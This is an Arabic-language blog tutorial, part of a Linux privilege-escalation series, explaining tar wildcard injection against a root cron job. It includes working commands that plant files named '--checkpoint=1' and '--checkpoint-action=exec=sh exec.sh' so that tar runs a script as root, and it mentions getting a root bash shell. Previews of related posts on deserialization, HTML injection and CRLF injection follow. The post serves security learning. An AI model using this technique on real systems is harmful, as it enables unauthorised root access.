pt3[linux privilege escalation techniques] Wildcard Injection

السلام عليكم ورحمة الله وبركاتة،

تكمله لسلسة Linux Privilege Escalation techniques راح نتكلم عن Wildcard injection

في البداية ناخذ تعريف عن Wildcard injection بكل بساطة هي رموز في اللينكس[?]([]) [*] مميزه  يرمز على الجميع،

 تستخدم مع جميع الباينيري على الينكس. مثال على ذالك ناخذ امر مع wildcard &ls

لو فرضنا لدينا مجلد يحتوي على كثير من انواع متعدده من الملفات بامتدادات مختلفه ونريد ان نظهر فقط الملفات التي بمتداد gif مثلا، الامر يكون كالتالي بستخدام wildcard

ls -lia *.gif
مثل مانلاحظ قام بستخراج جميع الملفات الموجوده داخل الملجلد تحت امتداد gif


طيب الان بعد ماعرفنا ماهو wildcard واستخدامه، نجي لزبده الموضوع كيف يتم التصعيد من wildcard

التكنيك المستخدم wildcard injection كثيره ولكن راح اتطرق على للب او اساس الموضوع حتى اترك لكم ساحة التفكير ، في البداية راح ابسط فكرة الحقن , لنفرض
 ا) الروت قام بعمل cron job للامر tar كل ٥ دقائق على مجلد /home/example/*
ب) الهكر لديه التصريح على ملجد example

الفكرة الهكر يقوم بحقن متغير معين في الباينيري tar يسمح له بالاتصال ع باينيري اخر مثلا bin/bash -i
يحصل على interactive shell من الباش بصلاحيات الروت عندما يقوم بتنفيذ امر الضغط كل خمس دقائق وينفذ الحقن الذي قام به الهكر في المجلد ناخذ مثال/فكرة في الية الحقن،

 echo "" > --help
ls * سوف يقوم بطابعه واجهه help بدلا من عرض الملفات والمجلدات للجميع. اعتقد وضحت الفكرة
الان ناخذ مثال

 نلاحظ هنا ، وجود كرون جوب كل ١٠ دقائق يقوم بعمل ضغط لملجلد /tmp/backup/* باستخدام wildcard

 دخلنا المجلد ووجدنا انه لدينا صلاحيات كامله في المجلد نقوم بحقن امر checkpoints في tar حتى 
 echo "id > tt.txt;chmod 777 tt.txt" > exec.sh
 chmod +x exec.sh
echo "" > --checkpoint=1
 echo "" > "--checkpoint-action=exec=sh exec.sh"
https://www.gnu.org/software/tar/manual/html_section/tar_26.html
 بعد الانتظار ١٠دقائق نلاحظ بأن الملف tt.txt موجود نقوم بالقراءه والناتج
 
دمتم بود.

تعليقات

إرسال تعليق

المشاركات الشائعة من هذه المدونة

Deserialization vulnerability in Node.js RCE

صورة
السلام عليكم ورحمة الله وبركاتة، اليوم حاب اتكلم عن ثغره Deserialization في node.js راح اتطرق في الموضوع عن ثلاث محاور. 1-تعريف عن node.js Node.js هو نظام برامج مصمم لكتابة تطبيقات إنترنت قابلة للتوسع كخوادم الويب لاتختلف كثيرا عن برمجيات الويب ابلكيشن يوجد لديها من المكتبات والموديلز 2- سبب الثغرة وحدوثها في عام 2017 تم اكتشاف ثغرة في دالة  unserialize() تحت   مودل   node-serialize  0.0.4 تسمح للمخترق  باستغلال الثغرة للوصول الى remote code execution عن طريق ادخال  serialized  JavaScript Object مع اضافه مصطلح  IIFE = () الاستدعاء التنفيذ المدخل على الفور من وقت ادخال المدخل وهي اختصار   Immediately-Invoked Function Expression لنرى الفرق بين object Serializedيحتوي على remote code execution payload من دون   IIFE Expression في حالة عدم وجود IIFE لايقوم Serialized object بتنفيذ البايلود يقوم بطابعه الSerialized object للpayload من دون التنفيذ فقط ناخذ مثال نقوم بحفظه من ثم التنفيذ لنرى كما نرى تم طباعه Serialize obj
قراءة المزيد

Html code injection-[Post-Get-StoredData!]-

صورة
السلام عليكم ورحمة الله وبركاتة،    بسم الله الرحمن الرحيم والصلاة والسلام على أشرف الخلق والمرسلين ، اليوم شرحنا راح نتكلم عن ثغرات HTML INJECTION وذلك عن طريق حقن كود HTML بالمدخل او المتغير المصاب ومحاولة استغلالها بعده طرق,  بالاول ناخذ تعريف عن   [ HTML = [ HyperText Markup Language تعني لغة توصيف النص التشعبي: wikipedia   بالعادة لغة توصيف النص التشعبي تكون بالدرجة الاولى في تصميم وتوظيف قوالب والنصوص. في الويب ابلكيشن وهاذا شيء طبيعي جدا. ولكن تكمن ثغراتها في تحقق المدخلاات مثلها مثل اي ثغرة اخرى في الويب ابلكيشن. اي  لنفرض بأن لدي صفحه في موقع معين مبني على HyperText Markup Language   بالكامل ولديه مدخل بأسم [" Search "] وليس عليه تحقيق او فلتره للمدخل في هالحاله تكمن الاصابة، ولكن تختلف المعاير في طريقة الارسال والاستقبال الحزم. وعندما اعني تختلف في الارسال اي اعني في الطلب والاستقبال من خلال طرق الارسال Hypertext ] Transfer Protocol ]= Http. وكما تسمى Http Method&*Http Verbs/ وهي في الغالب تكون مابين اثنين اكثر انتشار وهم Get ^ & ^ P
قراءة المزيد

CRLF injection [\r\n Carriage Return]

صورة
السلام عليكم ورحمة الله وبركاتة , .  في البداية ناخذ تعريف عن معنى CRLF CRLF   CR=Carriage Return   %0d 0x0D \r LF=Line feed 0x0A %0a \n ماهو crlf عندما يقوم شخص بارسال طلب من المتصفح الى السيرفر  السيرفر راح يرد بالريسبونس يحتوي على  http response headers content Carriage Return Line feed تستخدم في ملاحظه انتهاء الاين او السطر و كما نلاحظ طريقه الفصل بين Header مع الContent Carriage Return&line feed لكن تختلف من ويندوز الى لينكس  حيث الويندوز يتطلب  بانتهى السطر با crlf في بروتوكول http/https اما في لينكس  line feed  lf يتطلب  فقط في بروتوكول الhttp  اين تكمن الثغرة: الثغرة تكمن عندما يضع المبرمج مدخل يستطيع المخترق او المستخدم بالتحكم في response header مثال من بعض الامثله التحكم في الوق مثلا الان وقت الاسغلال والتصعيد من بعض خطورة crlf ممكن التصعيد الى xss ,Session Fixation,openredirect ايضا ممكن rce على حسب المحتوى من خطوره crsf ممكن استغلالها على حسب المحتوى اذا كان HTTP HEADER IN
قراءة المزيد